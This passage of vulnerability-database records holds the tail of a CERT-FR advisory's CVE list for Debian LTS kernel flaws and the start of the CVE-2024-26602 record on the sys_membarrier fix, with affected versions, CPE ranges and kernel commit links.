"url": "https://www.cve.org/CVERecord?id=CVE-2024-26901"
},
{
"name": "CVE-2024-27046",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27046"
},
{
"name": "CVE-2024-26903",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26903"
},
{
"name": "CVE-2024-26993",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26993"
},
{
"name": "CVE-2024-27024",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27024"
},
{
"name": "CVE-2024-27053",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27053"
},
{
"name": "CVE-2024-27075",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27075"
},
{
"name": "CVE-2024-26891",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26891"
},
{
"name": "CVE-2024-26951",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26951"
},
{
"name": "CVE-2024-26855",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26855"
},
{
"name": "CVE-2024-27045",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27045"
},
{
"name": "CVE-2024-26923",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26923"
},
{
"name": "CVE-2024-26851",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26851"
},
{
"name": "CVE-2024-26926",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26926"
},
{
"name": "CVE-2024-26988",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26988"
},
{
"name": "CVE-2023-52585",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52585"
},
{
"name": "CVE-2022-48655",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48655"
},
{
"name": "CVE-2023-52882",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52882"
},
{
"name": "CVE-2024-26900",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26900"
},
{
"name": "CVE-2024-27398",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27398"
},
{
"name": "CVE-2024-27399",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27399"
},
{
"name": "CVE-2024-27401",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27401"
},
{
"name": "CVE-2024-35848",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35848"
},
{
"name": "CVE-2024-35947",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35947"
},
{
"name": "CVE-2024-36017",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36017"
},
{
"name": "CVE-2024-36031",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36031"
},
{
"name": "CVE-2024-36883",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36883"
},
{
"name": "CVE-2024-36886",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36886"
},
{
"name": "CVE-2024-36889",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36889"
},
{
"name": "CVE-2024-36902",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36902"
},
{
"name": "CVE-2024-36904",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36904"
},
{
"name": "CVE-2024-36905",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36905"
},
{
"name": "CVE-2024-36916",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36916"
},
{
"name": "CVE-2024-36919",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36919"
},
{
"name": "CVE-2024-36929",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36929"
},
{
"name": "CVE-2024-36933",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36933"
},
{
"name": "CVE-2024-36934",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36934"
},
{
"name": "CVE-2024-36939",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36939"
},
{
"name": "CVE-2024-36940",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36940"
},
{
"name": "CVE-2024-36941",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36941"
},
{
"name": "CVE-2024-36946",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36946"
},
{
"name": "CVE-2024-36950",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36950"
},
{
"name": "CVE-2024-36953",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36953"
},
{
"name": "CVE-2024-36954",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36954"
},
{
"name": "CVE-2024-36957",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36957"
},
{
"name": "CVE-2024-36959",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36959"
},
{
"name": "CVE-2023-52656",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52656"
},
{
"name": "CVE-2023-52669",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52669"
},
{
"name": "CVE-2023-52679",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52679"
},
{
"name": "CVE-2023-52683",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52683"
},
{
"name": "CVE-2023-52686",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52686"
},
{
"name": "CVE-2023-52690",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52690"
},
{
"name": "CVE-2023-52691",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52691"
},
{
"name": "CVE-2023-52693",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52693"
},
{
"name": "CVE-2023-52694",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52694"
},
{
"name": "CVE-2023-52696",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52696"
},
{
"name": "CVE-2023-52698",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52698"
},
{
"name": "CVE-2023-52699",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52699"
},
{
"name": "CVE-2023-52880",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52880"
},
{
"name": "CVE-2024-27395",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27395"
},
{
"name": "CVE-2024-27396",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27396"
},
{
"name": "CVE-2024-27405",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27405"
},
{
"name": "CVE-2024-27410",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27410"
},
{
"name": "CVE-2024-27412",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27412"
},
{
"name": "CVE-2024-27413",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27413"
},
{
"name": "CVE-2024-27416",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27416"
},
{
"name": "CVE-2024-27417",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27417"
},
{
"name": "CVE-2024-27419",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27419"
},
{
"name": "CVE-2024-27431",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27431"
},
{
"name": "CVE-2024-27436",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27436"
},
{
"name": "CVE-2024-35789",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35789"
},
{
"name": "CVE-2024-35791",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35791"
},
{
"name": "CVE-2024-35796",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35796"
},
{
"name": "CVE-2024-35806",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35806"
},
{
"name": "CVE-2024-35809",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35809"
},
{
"name": "CVE-2024-35811",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35811"
},
{
"name": "CVE-2024-35813",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35813"
},
{
"name": "CVE-2024-35815",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35815"
},
{
"name": "CVE-2024-35821",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35821"
},
{
"name": "CVE-2024-35822",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35822"
},
{
"name": "CVE-2024-35823",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35823"
},
{
"name": "CVE-2024-35825",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35825"
},
{
"name": "CVE-2024-35828",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35828"
},
{
"name": "CVE-2024-35829",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35829"
},
{
"name": "CVE-2024-35830",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35830"
},
{
"name": "CVE-2024-35833",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35833"
},
{
"name": "CVE-2024-35845",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35845"
},
{
"name": "CVE-2024-35847",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35847"
},
{
"name": "CVE-2024-35849",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35849"
},
{
"name": "CVE-2024-35852",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35852"
},
{
"name": "CVE-2024-35854",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35854"
},
{
"name": "CVE-2024-35877",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35877"
},
{
"name": "CVE-2024-35879",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35879"
},
{
"name": "CVE-2024-35895",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35895"
},
{
"name": "CVE-2024-35905",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35905"
},
{
"name": "CVE-2024-35915",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35915"
},
{
"name": "CVE-2024-35922",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35922"
},
{
"name": "CVE-2024-35930",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35930"
},
{
"name": "CVE-2024-35933",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35933"
},
{
"name": "CVE-2024-35935",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35935"
},
{
"name": "CVE-2024-35936",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35936"
},
{
"name": "CVE-2024-35940",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35940"
},
{
"name": "CVE-2024-35944",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35944"
},
{
"name": "CVE-2024-35950",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35950"
},
{
"name": "CVE-2024-35955",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35955"
},
{
"name": "CVE-2024-35967",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35967"
},
{
"name": "CVE-2024-35969",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35969"
},
{
"name": "CVE-2024-35973",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35973"
},
{
"name": "CVE-2024-35976",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35976"
},
{
"name": "CVE-2024-35978",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35978"
},
{
"name": "CVE-2024-35982",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35982"
},
{
"name": "CVE-2024-35984",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35984"
},
{
"name": "CVE-2024-35990",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35990"
},
{
"name": "CVE-2024-36006",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36006"
},
{
"name": "CVE-2024-36007",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36007"
},
{
"name": "CVE-2024-36014",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36014"
},
{
"name": "CVE-2024-36015",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36015"
},
{
"name": "CVE-2024-36016",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36016"
},
{
"name": "CVE-2023-52670",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52670"
},
{
"name": "CVE-2023-52675",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52675"
},
{
"name": "CVE-2024-35819",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35819"
},
{
"name": "CVE-2024-35835",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35835"
},
{
"name": "CVE-2024-35837",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35837"
},
{
"name": "CVE-2024-35958",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35958"
},
{
"name": "CVE-2024-35960",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35960"
},
{
"name": "CVE-2024-35997",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35997"
},
{
"name": "CVE-2024-36020",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36020"
},
{
"name": "CVE-2021-33630",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-33630"
},
{
"name": "CVE-2023-52672",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52672"
},
{
"name": "CVE-2024-27414",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27414"
},
{
"name": "CVE-2024-31076",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-31076"
},
{
"name": "CVE-2024-33621",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-33621"
},
{
"name": "CVE-2024-35785",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35785"
},
{
"name": "CVE-2024-35805",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35805"
},
{
"name": "CVE-2024-35807",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35807"
},
{
"name": "CVE-2024-35853",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35853"
},
{
"name": "CVE-2024-35855",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35855"
},
{
"name": "CVE-2024-35871",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35871"
},
{
"name": "CVE-2024-35884",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35884"
},
{
"name": "CVE-2024-35886",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35886"
},
{
"name": "CVE-2024-35888",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35888"
},
{
"name": "CVE-2024-35893",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35893"
},
{
"name": "CVE-2024-35896",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35896"
},
{
"name": "CVE-2024-35897",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35897"
},
{
"name": "CVE-2024-35898",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35898"
},
{
"name": "CVE-2024-35899",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35899"
},
{
"name": "CVE-2024-35900",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35900"
},
{
"name": "CVE-2024-35902",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35902"
},
{
"name": "CVE-2024-35910",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35910"
},
{
"name": "CVE-2024-35925",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35925"
},
{
"name": "CVE-2024-35934",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35934"
},
{
"name": "CVE-2024-35962",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35962"
},
{
"name": "CVE-2024-35983",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35983"
},
{
"name": "CVE-2024-35988",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35988"
},
{
"name": "CVE-2024-35996",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35996"
},
{
"name": "CVE-2024-36004",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36004"
},
{
"name": "CVE-2024-36005",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36005"
},
{
"name": "CVE-2024-36008",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36008"
},
{
"name": "CVE-2024-36286",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36286"
},
{
"name": "CVE-2024-36288",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36288"
},
{
"name": "CVE-2024-36960",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36960"
},
{
"name": "CVE-2024-36964",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36964"
},
{
"name": "CVE-2024-36971",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36971"
},
{
"name": "CVE-2024-37353",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37353"
},
{
"name": "CVE-2024-37356",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37356"
},
{
"name": "CVE-2024-38381",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38381"
},
{
"name": "CVE-2024-38549",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38549"
},
{
"name": "CVE-2024-38552",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38552"
},
{
"name": "CVE-2024-38558",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38558"
},
{
"name": "CVE-2024-38559",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38559"
},
{
"name": "CVE-2024-38560",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38560"
},
{
"name": "CVE-2024-38565",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38565"
},
{
"name": "CVE-2024-38567",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38567"
},
{
"name": "CVE-2024-38578",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38578"
},
{
"name": "CVE-2024-38579",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38579"
},
{
"name": "CVE-2024-38582",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38582"
},
{
"name": "CVE-2024-38583",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38583"
},
{
"name": "CVE-2024-38587",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38587"
},
{
"name": "CVE-2024-38589",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38589"
},
{
"name": "CVE-2024-38596",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38596"
},
{
"name": "CVE-2024-38598",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38598"
},
{
"name": "CVE-2024-38599",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38599"
},
{
"name": "CVE-2024-38601",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38601"
},
{
"name": "CVE-2024-38612",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38612"
},
{
"name": "CVE-2024-38618",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38618"
},
{
"name": "CVE-2024-38621",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38621"
},
{
"name": "CVE-2024-38627",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38627"
},
{
"name": "CVE-2024-38633",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38633"
},
{
"name": "CVE-2024-38634",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38634"
},
{
"name": "CVE-2024-38637",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38637"
},
{
"name": "CVE-2024-38659",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38659"
},
{
"name": "CVE-2024-38780",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38780"
},
{
"name": "CVE-2024-39292",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39292"
}
],
"initial_release_date": "2024-06-28T00:00:00",
"last_revision_date": "2024-06-28T00:00:00",
"links": [],
"reference": "CERTFR-2024-AVI-0527",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2024-06-28T00:00:00.000000"
}
],
"risks": [
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "D\u00e9ni de service"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans le noyau Linux de Debian LTS. Elles permettent \u00e0 un attaquant de provoquer une \u00e9l\u00e9vation de privil\u00e8ges, une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es et un d\u00e9ni de service.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans le noyau Linux de Debian LTS",
"vendor_advisories": [
{
"published_at": "2024-06-25",
"title": "Bulletin de s\u00e9curit\u00e9 Debian LTS DLA-3840-1",
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"published_at": "2024-06-25",
"title": "Bulletin de s\u00e9curit\u00e9 Debian LTS DLA-3842-1",
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"published_at": "2024-06-25",
"title": "Bulletin de s\u00e9curit\u00e9 Debian LTS DLA-3843-1",
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
},
{
"published_at": "2024-06-25",
"title": "Bulletin de s\u00e9curit\u00e9 Debian LTS DLA-3841-1",
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
}
]
}
CVE-2024-26602 (GCVE-0-2024-26602)
Vulnerability from cvelistv5
Published
2024-02-24 14:56
Modified
2025-05-04 08:52
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
sched/membarrier: reduce the ability to hammer on sys_membarrier
On some systems, sys_membarrier can be very expensive, causing overall
slowdowns for everything. So put a lock on the path in order to
serialize the accesses to prevent the ability for this to be called at
too high of a frequency and saturate the machine.
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 22e4ebb975822833b083533035233d128b30e98f Version: 22e4ebb975822833b083533035233d128b30e98f Version: 22e4ebb975822833b083533035233d128b30e98f Version: 22e4ebb975822833b083533035233d128b30e98f Version: 22e4ebb975822833b083533035233d128b30e98f Version: 22e4ebb975822833b083533035233d128b30e98f Version: 22e4ebb975822833b083533035233d128b30e98f Version: 22e4ebb975822833b083533035233d128b30e98f |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26602",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-29T16:20:03.636502Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:48:51.858Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:07:19.594Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3cd139875e9a7688b3fc715264032620812a5fa3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2441a64070b85c14eecc3728cc87e883f953f265"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/db896bbe4a9c67cee377e5f6a743350d3ae4acf6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/50fb4e17df319bb33be6f14e2a856950c1577dee"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/24ec7504a08a67247fbe798d1de995208a8c128a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b6a2a9cbb67545c825ec95f06adb7ff300a2ad71"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c5b2063c65d05e79fad8029324581d86cfba7eea"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/944d5fe50f3f03daacfea16300e656a1691c4a23"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"kernel/sched/membarrier.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3cd139875e9a7688b3fc715264032620812a5fa3",
"status": "affected",
"version": "22e4ebb975822833b083533035233d128b30e98f",
"versionType": "git"
},
{
"lessThan": "2441a64070b85c14eecc3728cc87e883f953f265",
"status": "affected",
"version": "22e4ebb975822833b083533035233d128b30e98f",
"versionType": "git"
},
{
"lessThan": "db896bbe4a9c67cee377e5f6a743350d3ae4acf6",
"status": "affected",
"version": "22e4ebb975822833b083533035233d128b30e98f",
"versionType": "git"
},
{
"lessThan": "50fb4e17df319bb33be6f14e2a856950c1577dee",
"status": "affected",
"version": "22e4ebb975822833b083533035233d128b30e98f",
"versionType": "git"
},
{
"lessThan": "24ec7504a08a67247fbe798d1de995208a8c128a",
"status": "affected",
"version": "22e4ebb975822833b083533035233d128b30e98f",
"versionType": "git"
},
{
"lessThan": "b6a2a9cbb67545c825ec95f06adb7ff300a2ad71",
"status": "affected",
"version": "22e4ebb975822833b083533035233d128b30e98f",
"versionType": "git"
},
{
"lessThan": "c5b2063c65d05e79fad8029324581d86cfba7eea",
"status": "affected",
"version": "22e4ebb975822833b083533035233d128b30e98f",
"versionType": "git"
},
{
"lessThan": "944d5fe50f3f03daacfea16300e656a1691c4a23",
"status": "affected",
"version": "22e4ebb975822833b083533035233d128b30e98f",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"kernel/sched/membarrier.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.14"
},
{
"lessThan": "4.14",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.79",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.18",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.79",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.18",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.6",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsched/membarrier: reduce the ability to hammer on sys_membarrier\n\nOn some systems, sys_membarrier can be very expensive, causing overall\nslowdowns for everything. So put a lock on the path in order to\nserialize the accesses to prevent the ability for this to be called at\ntoo high of a frequency and saturate the machine."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:52:06.429Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3cd139875e9a7688b3fc715264032620812a5fa3"
},
{
"url": "https://git.kernel.org/stable/c/2441a64070b85c14eecc3728cc87e883f953f265"
},
{
"url": "https://git.kernel.org/stable/c/db896bbe4a9c67cee377e5f6a743350d3ae4acf6"
},
{
"url": "https://git.kernel.org/stable/c/50fb4e17df319bb33be6f14e2a856950c1577dee"
},
{
"url": "https://git.kernel.org/stable/c/24ec7504a08a67247fbe798d1de995208a8c128a"
},
{
"url": "https://git.kernel.org/stable/c/b6a2a9cbb67545c825ec95f06adb7ff300a2ad71"
},
{
"url": "https://git.kernel.org/stable/c/c5b2063c65d05e79fad8029324581d86cfba7eea"
},
{
